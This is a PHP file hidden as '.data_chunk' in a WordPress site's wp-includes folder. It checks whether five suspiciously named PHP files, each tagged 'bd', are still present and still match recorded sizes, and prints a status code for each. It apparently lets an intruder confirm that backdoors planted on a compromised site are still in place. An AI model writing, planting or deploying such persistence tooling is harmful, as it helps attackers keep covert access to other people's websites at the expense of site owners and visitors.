File: /var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/rest-api/.data_chunk
<?php $r = ''; $x = ["/var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/assets/news_randomnews.php"=>"bd@@766621@@884",
"/var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/assets/pascal.php"=>"bd@@1055675@@932",
"/var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/assets/front.page.template.1772625099.php"=>"bd@@766169@@934",
"/var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/assets/lamina.php"=>"bd@@916710@@915",
"/var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/rest-api/search-template-1772625097.php"=>"bd@@766450@@801"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');